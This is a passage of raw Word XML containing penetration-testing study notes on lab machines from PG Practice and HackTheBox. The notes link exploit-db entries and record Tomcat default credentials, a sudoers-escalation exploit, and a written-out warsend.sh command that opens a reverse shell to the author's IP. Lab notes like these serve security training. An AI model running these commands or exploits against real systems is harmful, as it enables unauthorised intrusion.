    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rpc.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (found in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/rpc.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1318">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice. They saw it a process (running as root) was running /opt/rpc.py which is suspicious since anything in /opt/ is third party. So they found this exploit and used it to add their user to /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1319">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50983</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A47">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsive FileManager 9.13.4 (LFI for foothold) and openemr 5.0.1 (authentication for reverse shell) were both exploited in Apex PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1320">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more in-depth writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1321">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is short writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are the Responsive FileManager 9.13.4  exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1322">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (49359)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1323">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (45987)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The one used for openmr was exploitdb 45161 and they both downloaded from searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Tomcat/7.04 (Tomcat 7.0.4) was enumerated in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1324">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sorcerer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice and used to find ZIP files that had SSH keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should look at other writeups too since the one I linked was short</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Tomcat 7.0.88 was seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jerry HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it involved trying to go to the manager webapp link and then clicking "cancel" when it asks for creds, and then seeing the creds </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat:s3cret </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then using that to login </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3263900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="280" name="image276.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image276.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1325"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="32639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55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2844800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="323" name="image315.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image315.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1326"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2844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56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once logged in, you see the WAR file you can upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So I found this github that uploads and triggers WAR reverse shell for Apache Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1327">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/thewhiteh4t/warsend</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then I ran it and got reverse shell (no need to set up listener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./warsend.sh 10.10.16.2 4444 10.10.10.95 8080 tomcat s3cret revshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.16.2 is my IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.95 is the target IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creds are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat:s3cret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">htmly was enumerated in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1328">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice but nothing was useful there but it did teach us how to enumerate a little</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A60">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grav CMS (GravCMS) was exploited in Astronaut PG Practice. NO AUTHENTICATION NEEDED and they got rev shell from it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1329">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they used exploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1330">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49973</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1331">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they used exploitDB but it pointed to a metasploit module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1332">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49788</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
